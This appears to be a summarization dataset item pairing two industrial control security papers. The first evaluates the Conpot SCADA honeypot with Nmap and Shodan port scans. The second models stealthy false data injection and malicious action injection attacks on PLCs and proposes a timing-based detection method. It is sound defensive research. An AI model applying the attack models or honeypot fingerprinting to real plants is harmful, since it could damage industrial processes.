Kamstrup Smart Meter | 22, 25, 514, 1025, 1068 | 1025, 50100
After utilizing the -Pn flag to suppress pings during scans, many more ports were identified across the various Conpot templates. However, most of these additional ports were not SCADA ports; for example, port 514 is used for system logging, while many of the opened SCADA ports remained undetected. This indicates that Conpot installations running on Ubuntu are very susceptible to having default Ubuntu services enabled and listening on a multitude of ports that would not be available on a standard SCADA installation. As a final point of comparison, all ports were scanned to determine what a full Nmap scan would show as open (Table IV). On average these scans took around three to four hours to complete due to their intensity.
The wide range of additional open ports, including ports in the dynamic/private range of 49152-65535 (note: the Kamstrup Smart Meter statically assigns a port in this range), again calls into question the ability of a default Conpot installation that does not actively close all other port-opening Ubuntu services to masquerade as an actual SCADA device, whether comprehensive port scanning or repositories such as Shodan are utilized.
TABLE IV. NMAP SCANNING (UTILIZING -v, -A, -Pn, AND -p- FLAGS)
Honeypot Type | Result | Ports Opened by Conpot
Siemens S7-200 | 22, 80, 102, 502, 514, 2000, 5060, 8008, 8020, 18556 | 80, 102, 161, 502, 623, 47808
Guardian AST | 22, 514, 2000, 3826, 5060, 8008, 8020, 10001, 11190, 19116, 36123, 43787, 48191, 63790 | 10001
IPMI | 22, 2000, 5060, 8008, 8020 | 623
Kamstrup Smart Meter | 22, 514, 1025, 2000, 4368, 5060, 8008, 32469, 50100, 52245, 57565 | 1025, 50100
Vanilla Ubuntu Install | 22, 514, 2000, 5060, 8008, 8020, 38051, 38093, 47785 | -
B. SHODAN Scan Data SHODAN data was also analyzed to determine which ports it detected as open within the various Conpot templates. SHODAN regularly scans the entire IPv4 internet address space and as such is a reliable indicator of what can be seen by third parties conducting reconnaissance scanning. Unfortunately, the IPMI and Kamstrup templates were never identified by SHODAN within the time constraints of the study.
TABLE V. SHODAN SCAN DATA RESULTS
Honeypot Type | SHODAN Port Scan Results | Conpot Ports
Siemens S7-200 | 22, 80, 102, 161 | 80, 102, 161, 502, 623, 47808
Guardian AST | 10001 | 10001
IPMI | N/A | 623
Kamstrup Smart Meter | N/A | 1025, 50100
C. Scan Data Discussion A very interesting finding in the Nmap scan data is that while the Guardian AST, Kamstrup, and IPMI devices all denied pings, the Siemens SIMATIC S7-200 did not.
When the ping option was removed for the result set in Table III, the results were more comprehensive and revealing. In every scan result, port 22 was shown as open, which is expected because SSH (via a PuTTY terminal) was used to access each honeypot. When comparing the ports that should have been open for each respective Conpot template against the results in Table III, Nmap failed to identify the following ports as open on their respective devices: Siemens S7-200: 102, 161, 502, 623, 47808; IPMI: 623; Kamstrup Smart Meter: 50100. However, these ports may have been missed because they are not among the top 1,000 ports that Nmap scans by default unless directed to scan every port. To that point, Nmap was eventually set to scan every port (Table IV). Even after scanning all ports, some ports that should have been open were still not found: Siemens S7-200: 161, 623, 47808; IPMI: 623. This requires further research. In the case of the Siemens device, SHODAN found port 161 and captured a banner from it, while Nmap did not detect it. More surprising during the full comprehensive scan was the large number of open ports that were not expected to be open at all (Table IV). Due to the large variety of ports discovered to be open, the vanilla Ubuntu image was also deployed without running any Conpot template. Based on a scan of this vanilla Ubuntu, it appears that more ports are opened than would originally be anticipated when running any given Conpot template. Further analysis will be needed to determine which extra open ports might be indicative of a honeypot rather than an effective emulation. The results from the SHODAN scan were also insightful in that they more accurately showed the Conpot instances as SCADA devices.
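The missed-port and unexpected-port lists above are simple set differences between the ports a template opens and the ports a scan reports. A short sketch, using the Siemens S7-200 numbers from the full-range scan (Table IV):

```python
# Ports the Conpot Siemens S7-200 template opens (Table IV, right column)
conpot_ports = {80, 102, 161, 502, 623, 47808}

# Ports reported by the full-range Nmap scan of that template (Table IV)
nmap_full_scan = {22, 80, 102, 502, 514, 2000, 5060, 8008, 8020, 18556}

missed = sorted(conpot_ports - nmap_full_scan)      # opened but not detected
unexpected = sorted(nmap_full_scan - conpot_ports)  # detected but not SCADA ports

print(missed)       # [161, 623, 47808] -- matches the missed-port list above
print(unexpected)   # non-SCADA ports that could betray the honeypot
```

The same two differences, computed per template, give both the detection gaps and the "extra open ports" that a sophisticated attacker could use to fingerprint the honeypot.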
This is primarily because SHODAN focuses its scan results on a much smaller port set, so its results do not show the large number of open ports revealed by the all-port Nmap scan. The most intriguing finding here, as previously mentioned, is that SHODAN found port 161 open on the Siemens device while Nmap did not. The banner grabbed by SHODAN also showed that the device was a Siemens SIMATIC S7-200. These findings suggest that Nmap is not fully effective in determining which ports are actually open. Unfortunately, at the time of this writing, SHODAN had not discovered the IPMI and Kamstrup devices, so a comparison of the SHODAN results for these devices with the Nmap port scans was not available. Additional future work includes evaluating the SCADA Honeynet honeypot, analyzing SCADA honeypot attacks, and evaluating log analysis tools. Another future task, cloaking honeypot signatures that could differentiate them from real SCADA devices and then evaluating attack differentials, could help determine whether honeypots are being identified. In conclusion, the devices accurately depicted SCADA ports, but appeared to have additional ports open that could reveal their identity as honeypots to sophisticated attackers. REFERENCES [1] S. Wade, "SCADA Honeynets: The attractiveness of honeypots as critical infrastructure security tools for the detection and analysis of advanced threats," Graduate Theses and Dissertations, Iowa State University, USA, 2011. [2] A. Serbanescu, S. Obermeir, and Der-Yeuan Yu, "ICS Threat Analysis Using a Large-Scale Honeynet," in Proceedings of the 3rd International Symposium for ICS & SCADA Cyber Security Research 2015, 2015, pp. 1-30. [3] D. Buza, F. Juhasz, and G. Miru, "Design and implementation of critical infrastructure protection system," Budapest University of Technology and Economics, Department of Networked Systems and Services, 2013. [4] D. Fronimos, E. Magkos, and V. Chrissikopoulos,
"Evaluating Low Interaction Honeypots and On their Use against Advanced Persistent Threats," in PCI '14: Proceedings of the 18th Panhellenic Conference on Informatics, Athens, Greece, October 2-4, 2014.
Summary:
Supervisory Control and Data Acquisition (SCADA) honeypots are key tools not only for determining threats which pertain to SCADA devices in the wild, but also for early detection of potential malicious tampering within a SCADA device network. An analysis of one such SCADA honeypot, Conpot, is conducted to determine its viability as an effective SCADA emulating device. A long-term analysis is conducted and a simple scoring mechanism leveraged to evaluate the Conpot honeypot.
|
Summarize:
I. INTRODUCTION The expansion and networking of systems in the context of Industry 4.0 and the Internet of Things is a top priority for many companies. This makes the security of IT systems more important than ever. Cyber attacks on an industrial control system (ICS) represent a real risk as ICSs become more integrated into other systems. Communication between controllers and plants increasingly takes place over a network, which is potentially vulnerable to cyber attacks. The focus of this paper is the security of ICS; in particular, the PLC level and the process level are considered here. Many approaches consider supervisory control and data acquisition (SCADA) systems. In the context of supervisory control of discrete event systems and the detection of cyber attacks, only a few approaches can be found in the literature ([1]-[8]). [1] proposed a supervisor robust against attacks in which an attacker can control the actuators to perform undesirable behavior; the supervisor fulfills its tasks both in nominal operation and under attack. [2] proposes a method based on fault-tolerant control for a system with partially vulnerable sensors and actuators: after detection, all controllable actuators are disabled so that the system never enters an unsafe state. A similar approach is proposed in [3], where a security module determines the attacked communication channels but only the necessary actuators are deactivated. In [4], unlike other approaches, no attack detection is used; based on prior knowledge about the attack models, a robust supervisor is designed. In [5] an attack capability is presented in which an attacker can manipulate the sensor signals, and a supervisor robust against these attacks is designed. [6] and [7] investigate the design of stealthy attack strategies. The authors are with the Institute of Automatic Control, University of Kaiserslautern, Erwin-Schroedinger Str.
12, 67653 Kaiserslautern, Germany (fritzr@eit.uni-kl.de; patrick-schwarz@gmx.de; pzhang@eit.uni-kl.de). A major problem of many existing detection algorithms for discrete event systems is that only the supervisory control layer is considered, together with the assumption that a potential attacker can manipulate only part of the sensor and actuator signals. In a realistic scenario, once an attacker has intruded into a network, it can be assumed that they have full access to all information transmitted over it. Accurate and error-free production processes are of great importance in industry; even a slight change in the process can lead to considerable damage. Through targeted manipulation of the ICS, individual work steps can be executed incorrectly or not at all. As will be shown later in the two attack scenarios, it is possible to inject false information or perform additional malicious actions. Such manipulations usually result in a logical and temporal change of the production process. In a previous study, the authors presented the modeling of two deception attacks, the replay attack and the covert attack, on cyber-physical systems with controllers based on signal interpreted Petri nets (SIPN) [8], and proposed an attack detection scheme based on permutation of the transmitted signals. In comparison to [8], the approach proposed in this paper does not require an active component in the control loop, since the time guard detection scheme only passively monitors the communication. Moreover, only an identification of the time guards is required here, and the Petri net structure of the detection unit can be adopted directly from the SIPN controller, whereas [8] required an identification of the closed-loop behavior of the system for detection. This paper introduces the detection method called time guard detection.
The considered attacks can hide manipulations on the logical level of the PLC, but are visible and detectable on the temporal level. The main contributions are: Attack models for two deception attacks on ICS modeled as SIPN are proposed; the cyber attacks are false data injection and malicious action injection. A detection method called time guard detection is proposed; the method allows detection of targeted manipulations of the ICS that result in a temporal change of the production process. The application of time guard detection is possible for systems in which all sensor and actuator channels, or only part of them, are vulnerable to attacks, i.e., can be observed and changed. II. PRELIMINARIES This section provides the necessary notations and definitions, based on [9] and [10], that will be used later. 2019 18th European Control Conference (ECC), Napoli, Italy, June 25-28, 2019. 978-3-907144-00-8 (c) 2019 EUCA. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11, 2025 at 16:38:52 UTC from IEEE Xplore. Restrictions apply. A Petri net can be represented by the four-tuple PN = (P, T, N+, N-), with a set of m places P = {p1, p2, ..., pm} and a set of n transitions T = {t1, t2, ..., tn}. The post-incidence matrix N+ (pre-incidence matrix N-) specifies the arcs and their weights from transitions to places (from places to transitions). The (m x n) matrix N = N+ - N- is the incidence matrix describing the system behavior, and N(., t) is the column corresponding to a t in T. The set of pre places of a transition t in T is •t = {p in P | N-(p, t) > 0} and the set of post places is t• = {p in P | N+(p, t) > 0}, with |•t| and |t•| as the numbers of pre places and post places. A transition t in T can fire at marking M(k) only if the enabling condition N- q(k) <= M(k) is fulfilled. Transition t is represented by the n-dimensional firing vector q(k) = [q1(k) q2(k) ... q|T|(k)]^T, whose j-th entry qj(k) is 1 while all other entries are 0.
The new marking M(k+1), resulting from firing t in T at time instant k, is determined by the Petri net state equation M(k+1) = M(k) + N q(k). A signal interpreted Petri net (SIPN) is described by SIPN = (PN, M0, I, O, phi, omega, W), with PN an ordinary Petri net, I and O the sets of binary input and output signals, phi a mapping associating every transition t in T with a firing condition phi(t) = Boolean function in I, omega a mapping associating every place p in P with an output omega(p) in {0, 1, -}, where (-) denotes don't care, and W the output matrix. The extended firing rules for SIPNs are [9]: 1) A t in T is enabled if all its pre places are marked and all its post places are unmarked. 2) A t in T fires immediately if it is enabled and phi(t) = 1. 3) All fireable transitions fire simultaneously. 4) The firing process is iterated until a stable marking is reached, i.e., until no transition can fire anymore. 5) After a stable marking is reached, the output signals are recalculated by applying W to the marking. The output matrix W is a |O| x m matrix, where |O| is the number of output signals, and Y(k) is the resulting output signal combination. The SIPN behavior can be described by M(k+1) = M(k) + N q(k), Y(k) = W M(k) (1), with q(k) determined by the firing rules shown above. In order to allow a time delay of the firing condition phi(t) for every transition t in T, the SIPN must be extended and can be described by the time-based SIPN = (SIPN, tau), with tau a set of individual time values for each transition t in T, describing the minimum time one of the pre places in •t must be marked before transition t can fire. This results in the following change of firing rule 1): 1) A transition t in T is enabled if all its pre places have been marked for at least the corresponding time value of tau and all its post places are unmarked. The timer of this transition is started as soon as at least one of its pre places is marked. Through the use of input and output signals, SIPNs have a strong relationship to industrial languages according to the IEC 61131-3 standard and can thus be used in ICS.
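The enabling condition N- q(k) <= M(k) and the state equation M(k+1) = M(k) + N q(k) can be exercised on a toy net. This two-place, one-transition example is only a sketch of the matrix formalism (NumPy chosen for the matrix arithmetic):

```python
import numpy as np

# Toy net: place p1 --t1--> place p2
N_minus = np.array([[1],     # N-(p1, t1): t1 consumes a token from p1
                    [0]])
N_plus = np.array([[0],
                   [1]])     # N+(p2, t1): t1 produces a token in p2
N = N_plus - N_minus         # incidence matrix

def enabled(M, q):
    # Enabling condition: N- q(k) <= M(k) componentwise
    return bool(np.all(N_minus @ q <= M))

def fire(M, q):
    # Petri net state equation: M(k+1) = M(k) + N q(k)
    return M + N @ q

M0 = np.array([1, 0])        # initial marking: one token in p1
q = np.array([1])            # firing vector selecting t1

M1 = fire(M0, q)
print(M1.tolist())           # [0, 1] -- the token moved from p1 to p2
print(enabled(M1, q))        # False  -- p1 is now empty, t1 cannot refire
```

The time-based extension described above would simply gate `fire` on an additional per-transition timer before the enabling check.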
For further information on SIPN see [9]. [Fig. 1: Structure of the attack model — the PLC and plant connected over the network, with the attacker in between and the signals I, O, I_c, O_c, I_a, O_a.] III. ATTACK MODEL We consider an ICS consisting of a plant and a PLC connected via a network. All inputs and outputs are transmitted over this network. The sensor signals of the system are described by the input vector I = (I1 ... Ir)^T and the actuator signals by the output vector O = (O1 ... Os)^T. The PLC controls the actuators of the plant based on the sensor data and is represented by SIPN_c. The attacker pursues an attack goal and is represented by SIPN_a. Subscript c denotes the controller and subscript a denotes the attacker. We assume that the network connection is unsafe and the attacker has read and write access to the data transmitted over the network. Furthermore, it is assumed that the attacker has extensive knowledge about the PLC and the process flow. By read access to the input and output signals, the controller may be identified, and with state estimation, the current marking of SIPN_c may be obtained by the attacker. The general model of the attacked system is shown in Fig. 1. The attack vectors are denoted by I_a and O_a. The input and output vectors of the system without attack are O = O_c and I_c = I. The manipulation of the attacker can be described by two binary diagonal matrices G_I and G_O, where the entries on the diagonal are 1 if the corresponding signal is vulnerable and 0 if it is not. In general, during an attack the input vector I_c of the PLC and the output vector O transferred to the actuators can be described by I_c = G_I I_a + (F_r - G_I) I, O = G_O O_a + (F_s - G_O) O_c (2), with F_r and F_s as identity matrices of dimension (r x r) and (s x s), respectively. If all sensor and actuator channels are vulnerable to attacks, G_I = F_r, G_O = F_s, and (2) can be simplified to I_c = I_a, O = O_a. Due to the complexity of large production systems, it is more difficult for the attacker to hide the manipulation.
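Equation (2) mixes attacker and plant signals channel by channel through the diagonal masks. A sketch with r = 3 sensor channels, of which only the first is vulnerable (the specific vectors are illustrative):

```python
import numpy as np

r = 3
G_I = np.diag([1, 0, 0])            # channel 1 vulnerable, channels 2 and 3 not
F_r = np.eye(r, dtype=int)          # identity matrix of dimension (r x r)

I_true = np.array([0, 1, 0])        # what the plant sensors actually report
I_attack = np.array([1, 0, 1])      # what the attacker injects

# I_c = G_I I_a + (F_r - G_I) I : attacked channels come from the attacker,
# unattacked channels pass through from the plant unchanged.
I_c = G_I @ I_attack + (F_r - G_I) @ I_true

print(I_c.tolist())                 # [1, 1, 0]
```

Setting G_I = F_r makes the second term vanish and reproduces the full-vulnerability simplification I_c = I_a stated above.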
In this case, the attacker can choose to manipulate only part of the I/Os at any one time to guarantee his invisibility, even if he has access to all I/Os. This means that very often only a specific subsystem is attacked. In the following, the two attack scenarios, false data injection and malicious action injection, are presented. A. False Data Injection In false data injection attacks, the goal of an attacker is to manipulate the sensor measurements to induce a change in the state variables without being detected. In [11], two attack types are considered, called random false data injection and targeted false data injection. [Fig. 2: SIPN model of False Data Injection.] In random false data injection, the attacker tries to find an attack vector (i.e., input vector) that injects arbitrary errors into the state variables. In targeted false data injection, the attacker has an attack goal and tries to find a vector that injects specific error behavior into the specific state variables chosen by him, without being detected. In this section a targeted false data injection attack for DES modeled by SIPN is considered. With read access to the network, the attacker can track the behavior of the controller SIPN_c. Then, in specific markings chosen by the attacker, false data is injected into the input vector I_c. This is illustrated by an example in Fig. 2. The attacker starts by observing the I/Os. As soon as the attacker has tracked the vector combination phi1 and omega2, the transition t_a1 fires and the attack starts. With omega_a2 the attacker injects false data into the input vector I_c of the controller. The firing condition of transition t2 is then satisfied, e.g., too early.
The attacker could also maintain a certain signal combination for a longer time to achieve a delayed firing of this transition. The individual transitions of the attacker may have a time delay as an additional firing condition. After reaching the attack goal, the attacker returns to his idle state p_a1 with t_a3 and again waits for the specific I/O vector combination. In summary, by injecting false data into the input vector I_c, individual process steps are executed for longer or shorter than intended. In addition, the attacker can also create unstable cycles, which completely skip some markings. In order to preserve invisibility, the attack can only be used in certain parts of a process in which a targeted injection of false data does not affect the program execution on the logical level; thus, the controller must be able to continue running normally after the attack goal is reached. From the PLC's point of view, this attack has no influence on the process flow and thus cannot be detected directly via the I/Os. The weak point of this attack is that, by injecting false data into the input vector I_c, the temporal behavior of the process flow changes; on the time level the attacker loses invisibility and can be detected. B. Malicious Action Injection The malicious action injection attack uses the basic idea of a covert attack, described in [12] and [13], to change the actuator signals to achieve an attack goal and to hide the influence of the attack on the sensor signals. [Fig. 3: SIPN model of Malicious Action Injection.] In general, the goal of the attacker is to perform additional or malicious actions during the runtime of the process without changing the program logic, preserving invisibility on the logical level. This attack requires full access to the input and output signals and extensive knowledge about the program logic of the PLC, which is assumed to be a normal SIPN.
This attack is modeled as a normal (non-time-based) SIPN and is represented by SIPNa with the behavior described by

Ma(k+1) = Ma(k) + Na qa(k)
Ya(k) = Wa Ma(k)    (3)

The attack consists of two separate phases:

Phase 1 (Synchronization): In this phase, the attacker synchronizes with the PLC by determining the active marking of SIPNc based on the I/Os. Before the attack, i.e., k < k0 with k0 as the start time of the attack, the vectors can be assumed to be Ic(k) = I(k), O(k) = Oc(k), Ia(k) = 0 and Oa(k) = 0. As soon as SIPNa has synchronized with SIPNc and the PLC has reached M(k) = Ma(k0), the attack is started.

Phase 2 (Attack): In this phase, the planned attack goal is executed for the period k0 ≤ k ≤ ka, where ka defines the end time of the attack. During the attack, the I/O vectors can be assumed to be Ic(k) = Ia(k) and O(k) = Oa(k). In specific markings the attacker suppresses certain input signals and thus prevents the following transitions from becoming active. Therefore the vector Ia can be assumed to be Ia(k) = I(k0 − 1) during the attack. Now some malicious actions are executed. Once the attack goal is reached (k = ka), the previously blocked transitions are released and the process continues to run normally.

Malicious action injection attacks are highly sophisticated and pose a serious threat to ICS. The attacks are particularly dangerous because they are not active all the time. They wait until the controller has reached a certain point in the program and then they become active. Some malicious actions are performed and then the attacker is inactive again. This is illustrated by an example in Figure 3. After synchronization, the attacker waits for the controller to reach the place p2. Subsequently, the attack is started. The attack phase is represented by the places pa1, pa2 and pa3 and the transitions ta1, ta2 and ta3.
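The marking update in equation (3) is an ordinary Petri-net state equation. A minimal sketch with an invented 3-place attacker ring (pa1 → pa2 → pa3 → pa1), not the system used later in the paper:

```python
# Toy illustration of the attacker SIPN dynamics from equation (3):
#   Ma(k+1) = Ma(k) + Na qa(k)
# on a made-up 3-place ring pa1 -> pa2 -> pa3 -> pa1.

Na = [  # incidence matrix: rows = places pa1..pa3, columns = transitions ta1..ta3
    [-1, 0, 1],   # pa1: consumed by ta1, produced by ta3
    [1, -1, 0],   # pa2: produced by ta1, consumed by ta2
    [0, 1, -1],   # pa3: produced by ta2, consumed by ta3
]

def fire(Ma, t):
    """Fire transition t: add column t of Na to the marking vector."""
    return [m + row[t] for m, row in zip(Ma, Na)]

Ma = [1, 0, 0]            # initial marking: attacker idle in pa1
for t in range(3):        # fire ta1, ta2, ta3 in sequence
    Ma = fire(Ma, t)
assert Ma == [1, 0, 0]    # one full attack cycle returns to the idle marking
```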
During the entire duration of the attack, the input vector of the controller is Ic(k) = I(k0 − 1) for k0 ≤ k ≤ ka. Thus, the attacker prevents the transition t2 from becoming active. For the firing conditions ja1, ja2 and ja3, the input vector I(k) of the physical plant is used. With the outputs of the markings pa1, pa2 and pa3, the output vector Oa is set. This is transmitted to the plant and can be assumed to be O(k) = Oa(k). After the attacker has reached the place pa3, the transition t2 is released again and Ic(k) = I(k). As soon as the firing condition j2 is fulfilled, the attack is terminated and the normal process continues. Similar to the false data injection, the malicious action injection attack is completely stealthy on the logical level and cannot be detected there. Although the plant executes additional actions during this attack, the defined process flow in the PLC is not affected. Only on the time level does the attacker lose his invisibility and can be detected.

C. Loss of Invisibility of the Attack on the Time Level

The attacker considered in this paper attacks the local network of the plant from outside, i.e., over the internet or from the cloud. That means the attacker has the problem of network delay and latency variation [14], depending on the distance to the attacked plant. This delay inhibits the correct identification of the time information of the system, while still allowing the correct identification on the logical level. During the attack phase, the attacker again has the problem of network delay. It is therefore reasonable to assume that the attacker cannot perfectly hide his attack on the time level. In a former study [15], an experimental setup with a Soft-PLC in the cloud (a software PLC running on Amazon Elastic Compute Cloud) that communicates with an I/O interface at a laboratory system (in our case the S7-300 PLC from Siemens, see Section V) was examined. The resulting network delays ranged from 5 ms to 4.59 s. Thus, attack detection based on the time level is a realistic approach.

IV.
ATTACK DETECTION

With the two attack scenarios described above, a detection method called time guard detection can now be designed to exploit the weak point of these attacks. For the basic idea of this attack detection, we were inspired by the approach of fault detection and isolation based on timed automata described in [16]. There, an identification algorithm was used to determine a timed automaton model of the closed-loop system for fault diagnosis. In particular, the timed model of a DES, which is defined as a timed automaton with guards as described in [17], can be used for the detection of cyber attacks instead of faults. This basic idea is adapted and used for the attack detection in DES based on SIPN. For the purpose of time guard detection, a new SIPN is defined, i.e., SIPNd = (PN, M0, I, j, C, τ, TG) with

- PN, M0, I and j as defined in Section II,
- C as a set of clocks,
- τ as a mapping associating every transition t ∈ T with timing information τ(t) ∈ {τmin, τmax, τtimeout},
- TG as a set of time guards.

Symbols with subscript d are associated with the time guard detection. Since this detection method is related to the events and actions of SIPNc and to the timing information of the real plant, the basic structure of SIPNd is inherited from SIPNc, i.e., PN, M0, I and j of SIPNd are identical to those of SIPNc. The set C with cardinality |C| = |T| contains as many clocks as transitions. The function g : T → C assigns a clock c ∈ C to a transition t ∈ T, where g(t) addresses the clock c of the transition t. A clock interpretation f is defined as f : C → R+, where f(c) represents the time value of the clock c. The starting condition of a clock c ∈ C is defined as

∃ p ∈ •t : p > 0    (4)

which means that the clock c is started as soon as at least one pre place of t is marked. The set TG contains boolean conditions expressed as functions of clocks. A time guard y ∈ TG is denoted as

y(t) = (f(g(t)) ≥ τ(t)min) ∧ (f(g(t)) ≤ τ(t)max)    (5)

where y(t) = True means that t has fired within the time interval and y(t) = False means that t has fired too early or too late.
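The time guard (5) is just an interval check on the stopped clock value. A minimal sketch; the function name is ours, and the example times are the ones reported in the detection experiment of Section V-C:

```python
# Interval check behind time guard (5): y(t) is True iff the stopped clock
# value f(g(t)) lies within [tau_min, tau_max]. Function name is illustrative.

def time_guard(clock_value, tau_min, tau_max):
    return tau_min <= clock_value <= tau_max

# Example times from the detection experiment in Section V-C:
assert time_guard(2.37, 1.9, 2.8)          # t1 fired nominally
assert not time_guard(1.5, 2.2, 3.0)       # t2 fired too early -> attack
```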
The evaluation of the timing information by y is started by the condition

(∀p ∈ •t : p = 1) ∧ (∀p ∈ t• : p = 0) ∧ (j(t) = True)    (6)

which means that the clock c is stopped and the timing information is evaluated by (5) as soon as all pre places are marked, all post places are unmarked and the firing condition j(t) of transition t is fulfilled. The condition of whether an attack has occurred can be formulated as

y(t) = True ⇒ nominal
y(t) = False ⇒ attacked    (7)

Algorithm 1 represents the time guard detection algorithm that can be used for attack detection in ICS. This algorithm is event triggered and is called with every change in the input vector Ic. To switch the detection on during runtime of the PLC, SIPNc and SIPNd must be synchronized. For this, SIPNc must reach a certain marking, e.g., the initial marking M0. As soon as the synchronization is completed, the clock g(t) is started once for all transitions Tinit = {t ∈ T | ∃p ∈ •t : p > 0}. A boolean variable stable is defined, which is set to True before processing the transitions and checking condition (6). For each transition t ∈ T which fulfills condition (6), the following steps are performed:

- The clock g(t) is stopped.
- The time guard y(t) is evaluated by (5).
- Considering (7), the alarm counter is incremented by 1 if y(t) = False.
- All pre places and post places of t are updated.
- The clock g(t) is reset.
- The boolean variable stable is set to False.

Afterwards, the clocks g(t) of all following transitions Tnext = {t ∈ T | ∃p ∈ •t : p > 0} are started. This process is
Algorithm 1: Time Guard Detection (event triggered)

  Input: new observed input vector Ic
  stable := False, AlarmCounter := 0
  while stable = False do
    stable := True
    Tactive := {t ∈ T | (∀p ∈ •t : p = 1) ∧ (∀p ∈ t• : p = 0) ∧ (j(t) = True)}
    foreach t ∈ Tactive do
      stop g(t)
      evaluate y(t) with (5)
      if y(t) = False then AlarmCounter := AlarmCounter + 1
      ∀p ∈ •t := 0, ∀p ∈ t• := 1
      reset g(t), stable := False
    Tnext := {t ∈ T | ∃p ∈ •t : p > 0}
    foreach t ∈ Tnext do start g(t)
  if AlarmCounter > 0 then DetectionAlarm := True
  return DetectionAlarm

Algorithm 2: Timeout alarm function (time triggered)

  TGtimeout := {t ∈ T | f(g(t)) ≥ τ(t)timeout}
  if |TGtimeout| > 0 then TOalarm := True
  else TOalarm := False
  return TOalarm

repeated until a stable marking has been reached, i.e., stable = True. Condition (6) ensures that the time of each fired transition is evaluated, even if it is contained in an unstable cycle. At the end, DetectionAlarm is set to True if AlarmCounter > 0. Here, a detection alarm is activated as soon as a single time deviation occurs, which can result in a high false alarm rate. If several of these time deviations should be required to activate a detection alarm, the last condition of Algorithm 1 must be adapted and extended by a residuum, i.e., (AlarmCounter > s) with s as the number of allowed time deviations. Algorithm 1 detects attacks based on the firing timing of the transitions. If an attacker blocks the firing of the transitions for a longer time, as shown in Section III, Algorithm 1 will not detect the attack. In order to preserve the functionality of the attack detection, a third time τtimeout is introduced. The time τtimeout represents the maximum upper limit of the time value f(g(t)). If t does not fire within the given time, the following condition is true:

q(t) = (f(g(t)) ≥ τ(t)timeout)    (8)

Based on (8), Algorithm 2 checks if a t ∈ T has exceeded its time limit and returns a corresponding timeout alarm. Algorithm 2 is time triggered and thus independent of the firing of transitions.
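Algorithms 1 and 2 can be condensed into a short sketch, assuming the transition firings and their stopped clock values have already been collected. Names, intervals and timestamps are illustrative; the real algorithm runs event-triggered on the live Petri-net marking:

```python
# Condensed sketch of Algorithm 1 (time guard check with residuum s) and
# Algorithm 2 (timeout alarm). Inputs are pre-collected (transition, clock)
# pairs rather than a live marking; all values are illustrative.

def time_guard_detection(firings, guards, s=0):
    """Alarm if more than s firings violate their [tau_min, tau_max] guard."""
    alarm_counter = 0
    for t, clock in firings:
        tau_min, tau_max = guards[t]
        if not (tau_min <= clock <= tau_max):   # time guard y(t), eq. (5)
            alarm_counter += 1
    return alarm_counter > s

def timeout_alarm(running_clocks, timeouts):
    """Algorithm 2: alarm if any still-running clock reached tau_timeout."""
    return any(clock >= timeouts[t] for t, clock in running_clocks.items())

guards = {"t1": (1.9, 2.8), "t2": (2.2, 3.0), "t3": (1.8, 2.5)}
nominal = [("t1", 2.37), ("t2", 2.5), ("t3", 2.1)]
attacked = [("t1", 2.37), ("t2", 1.5), ("t3", 2.1)]     # t2 fired too early
assert time_guard_detection(nominal, guards) is False
assert time_guard_detection(attacked, guards) is True
assert timeout_alarm({"t2": 6.5}, {"t2": 6.0}) is True  # blocked transition
```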
Remark 1: The times τmin, τmax and τtimeout can be determined from expert knowledge, from the records of a fault-free process flow, or with identification methods [16].

V. EXPERIMENTAL SET-UP

To analyze the effectiveness of both attacks and of the time guard detection under real conditions, a lab system is used.

Fig. 4: Lab system (feeder, drilling station, horizontal milling station, vertical milling station, storage)

TABLE I: I/O of feeder, drill and vertical mill

Input  Description            Output  Description
I0.6   feeder ready           O0.5    feeder signal
I0.7   feeder empty           O0.6    feeder motor
I1.2   top position           O1.2    motor up
I1.3   bottom position        O1.3    motor down
I1.4   workpiece at entrance  O1.4    drilling motor
I1.5   workpiece in position  O1.5    conveyor on
I2.2   top position           O2.2    motor up
I2.3   bottom position        O2.3    motor down
I2.4   workpiece at entrance  O2.4    milling motor
I2.5   workpiece in position  O2.5    conveyor on
I2.6   tool in position       O2.6    tool change motor

The system is shown in Figure 4, which was also used in [8] and [18]. The plant is connected to the PLC via 17 inputs and 17 outputs, which are shown in Table I (the I/Os of the horizontal milling station are omitted due to space constraints). A production cycle includes the treatment of one or more workpieces. Each workpiece is drilled two times, processed with each of the three tools of the vertical mill (VMill), milled by the horizontal mill and finally transported to the storage. The controller has a total of 63 places and 85 transitions.

A. False Data Injection

We now assume the system is being attacked by a false data injection attack with the goal of terminating the drilling process early. For this scenario, Figure 2 can be considered. In this attack, only the I/Os of the drilling station are considered. The input vector can thus be described by I = Ic = Ia = [I0.6 I0.7 I1.2 I1.3 I1.4 I1.5]^T and the output vector by O = Oc = Oa = [O0.5 O0.6 O1.2 O1.3 O1.4 O1.5]^T. The attacker looks for the input vector I = [1 0 1 0 0 1]^T and the output vector Oc = [0 0 0 1 1 0]^T, i.e.,
the workpiece is in position and the processing begins. As soon as this vector combination is tracked, the firing condition ja1 is fulfilled and the attack is started. The normal drilling process is completed as soon as the bottom position has been reached, i.e., I1.3 = 1. This normally takes about 2.7 s, and the drill is moved up again afterwards. After 1.5 s, the attacker injects the vector Ic = [1 0 0 1 0 1]^T with wa2, which satisfies this condition. At this time the drilling is not completed and the workpiece has been processed incorrectly. In this example, the complete input vector Ic was manipulated. However, only the two inputs I1.2 and I1.3 were required for the attack; all other signals were not manipulated. As soon as the attacker has tracked the output vector Oc = [0 0 1 0 1 0]^T, ta2 fires and pa3 becomes active. Now the attacker has reached the attack goal, and after a time-delayed firing of transition ta3 the attacker returns to the initial marking pa1. The attacker waits again for the specific I/O vector combination to start the next attack.

Fig. 5: Attack Detection (clock values and time guards: f(g(t1)) = 2.37 with τ1 = {1.9; 2.8; 5.5}, f(g(t2)) = 1.5 with τ2 = {2.2; 3; 6}, f(g(t3)) = 2.1 with τ3 = {1.8; 2.5; 5.5})

B. Malicious Action Injection

Next, we consider a malicious action injection attack on the tool change of the VMill, so that the workpiece is processed with the wrong tool. For this scenario, Figure 3 can be considered. The I/O vectors are I = Ic = Ia = [I2.2 I2.3 I2.4 I2.5 I2.6]^T and O = Oc = Oa = [O2.2 O2.3 O2.4 O2.5 O2.6]^T. At first we consider the tool change process without the attack. It is started in p2. Here Oc = [0 0 0 0 1]^T is active. At this point there is still a tool in position (I2.6 = 1). After the tool is no longer in position (I2.6 = 0), the condition j2 has been fulfilled and p3 is marked with Oc = [0 0 0 0 1]^T.
